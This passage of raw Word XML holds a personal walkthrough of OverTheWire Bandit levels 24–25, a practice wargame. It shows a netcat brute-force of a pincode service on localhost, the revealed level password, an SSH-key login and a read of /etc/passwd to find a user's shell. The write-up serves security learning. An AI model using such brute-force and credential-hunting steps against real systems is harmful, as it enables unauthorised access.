          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC431E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001250FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&gt; output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA9E166" w14:textId="0B37201B" w:rsidR="00DC74F9" w:rsidRDefault="00DC74F9" w:rsidP="00DC74F9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1250FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>nc localhost 30002 &lt; input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001250FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00CC431E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001250FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BBDB49" w14:textId="690A6B4D" w:rsidR="002052A7" w:rsidRDefault="00505503" w:rsidP="00530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[</w:t>
      </w:r>
      <w:r w:rsidR="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I redirect all command output to file</w:t>
      </w:r>
      <w:r w:rsidR="00DC74F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:r w:rsidR="00530858" w:rsidRPr="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610BAF00" w14:textId="77777777" w:rsidR="00530858" w:rsidRPr="00530858" w:rsidRDefault="00530858" w:rsidP="00530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5F8E4D87" w14:textId="3578021C" w:rsidR="002052A7" w:rsidRPr="00CC431E" w:rsidRDefault="002052A7" w:rsidP="00CC431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After several seconds</w:t>
      </w:r>
      <w:r w:rsidR="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> I could enter the command</w:t>
      </w:r>
      <w:r w:rsidR="00CC431E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00CC431E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00530858" w:rsidRPr="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>grep -v “Wrong!” output</w:t>
      </w:r>
      <w:r w:rsidR="00CC431E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC431E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">for displaying all the lines that </w:t>
      </w:r>
      <w:r w:rsidR="00AA24FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">don’t </w:t>
      </w:r>
      <w:r w:rsidR="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">contains </w:t>
      </w:r>
      <w:r w:rsidR="00AA24FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>error messages)</w:t>
      </w:r>
      <w:r w:rsidR="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C300E62" w14:textId="77777777" w:rsidR="00F365D8" w:rsidRPr="00F365D8" w:rsidRDefault="00530858" w:rsidP="00F365D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530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F365D8" w:rsidRPr="00F365D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A36FFAB" w14:textId="77777777" w:rsidR="00F365D8" w:rsidRDefault="00F365D8" w:rsidP="00F365D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F365D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout. Exiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B32994" w14:textId="3A5CEE84" w:rsidR="00530858" w:rsidRPr="00530858" w:rsidRDefault="00530858" w:rsidP="00F365D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530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014F0064" w14:textId="77777777" w:rsidR="00530858" w:rsidRPr="00530858" w:rsidRDefault="00530858" w:rsidP="00530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530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correct!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419CD50" w14:textId="04F2A7F8" w:rsidR="00530858" w:rsidRPr="00F365D8" w:rsidRDefault="00530858" w:rsidP="00530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530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The password of user bandit25 is </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4271">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG</w:t>
      </w:r>
      <w:r w:rsidRPr="00530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F365D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2283FF" w14:textId="032EC29B" w:rsidR="00175DDC" w:rsidRPr="00F365D8" w:rsidRDefault="00175DDC" w:rsidP="00530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33EC5641" w14:textId="256A3FA6" w:rsidR="00175DDC" w:rsidRDefault="00175DDC" w:rsidP="00530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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">[Be aware: </w:t>
      </w:r>
      <w:r w:rsidR="00505503" w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">I couldn’t </w:t>
      </w:r>
      <w:r w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">send more than 7000 lines </w:t>
      </w:r>
      <w:r w:rsidR="00505503" w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidR="00505503" w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the server</w:t>
      </w:r>
      <w:r w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">, so </w:t>
      </w:r>
      <w:r w:rsidR="00EC2C75" w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>that’s why I s</w:t>
      </w:r>
      <w:r w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">plit the input file into 2 input </w:t>
      </w:r>
      <w:r w:rsidR="00295AE0" w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r w:rsidR="00505503" w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="00505503">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781891C0" w14:textId="0D85B89C" w:rsidR="000F75D4" w:rsidRPr="000802C0" w:rsidRDefault="000F75D4" w:rsidP="00530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FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000802C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">[ Notice2: In the internet there is more </w:t>
      </w:r>
      <w:r w:rsidR="000802C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>simple</w:t>
      </w:r>
      <w:r w:rsidRPr="000802C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> code for </w:t>
      </w:r>
      <w:r w:rsidR="00951F57">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>solving the level</w:t>
      </w:r>
      <w:r w:rsidR="000802C0" w:rsidRPr="000802C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – check it out!]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F99D763" w14:textId="612C4AC1" w:rsidR="00941C7D" w:rsidRDefault="00941C7D" w:rsidP="00530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7B3CB2BD" w14:textId="77777777" w:rsidR="000802C0" w:rsidRDefault="000802C0" w:rsidP="00530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06CF66BF" w14:textId="71DE8657" w:rsidR="00530858" w:rsidRDefault="00530858" w:rsidP="00530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530858">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bandit25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7613E2A4" w14:textId="4169665B" w:rsidR="002052A7" w:rsidRDefault="00EF01A2" w:rsidP="006C320F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First, for displaying the folder’s files I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF01A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got the output: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF01A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandit26.sshkey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB343C" w14:textId="0D7F5BE7" w:rsidR="008B0ABC" w:rsidRPr="008B0ABC" w:rsidRDefault="00EF01A2" w:rsidP="008B0AB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Then I tried to log into the user with the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF01A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ssh -i bandit26.sshkey bandit26@localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF01A2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>and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9EBCDA" w14:textId="51047CE1" w:rsidR="008B0ABC" w:rsidRPr="00161898" w:rsidRDefault="008B0ABC" w:rsidP="008B0AB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8B0ABC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D7E3BC2" wp14:editId="4C84ACAE">
            <wp:extent cx="5943600" cy="949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895F" w14:textId="3516D68E" w:rsidR="00161898" w:rsidRDefault="00161898" w:rsidP="00EF01A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4831E5A5" w14:textId="731BD320" w:rsidR="00161898" w:rsidRDefault="00161898" w:rsidP="00EF01A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Later</w:t>
      </w:r>
      <w:r w:rsidR="00453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> with little research, I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>figure out</w:t>
      </w:r>
      <w:r w:rsidR="00453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">that if </w:t>
      </w:r>
      <w:r w:rsidR="00453EBE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> want to know what shell user bandit26 is running I need to enter the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00161898">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>grep bandit26 /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D5B08" w14:textId="12EBCA3E" w:rsidR="00161898" w:rsidRDefault="00161898" w:rsidP="00EF01A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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00161898">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F70CE6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1CBAD" w14:textId="4C7F7E32" w:rsidR="00F70CE6" w:rsidRDefault="00F70CE6" w:rsidP="00EF01A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52190F8B" w14:textId="5DA7A372" w:rsidR="00F70CE6" w:rsidRPr="00B759B7" w:rsidRDefault="00F70CE6" w:rsidP="00EF01A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B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">I used the command </w:t>
      </w:r>
      <w:r w:rsidR="00605C36" w:rsidRPr="00B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /usr/bin/showtext</w:t>
      </w:r>
      <w:r w:rsidR="00605C36" w:rsidRPr="00B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00605C36" w:rsidRPr="00B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>to display the file context:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A634651" w14:textId="6B026873" w:rsidR="00B759B7" w:rsidRPr="00B759B7" w:rsidRDefault="00605C36" w:rsidP="00B759B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B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B759B7" w:rsidRPr="00B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D8741" w14:textId="3E7D6116" w:rsidR="00B759B7" w:rsidRPr="00B759B7" w:rsidRDefault="00B759B7" w:rsidP="00B759B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B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>export TERM=linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A872E" w14:textId="77777777" w:rsidR="00B759B7" w:rsidRPr="00B759B7" w:rsidRDefault="00B759B7" w:rsidP="00B759B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B759B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
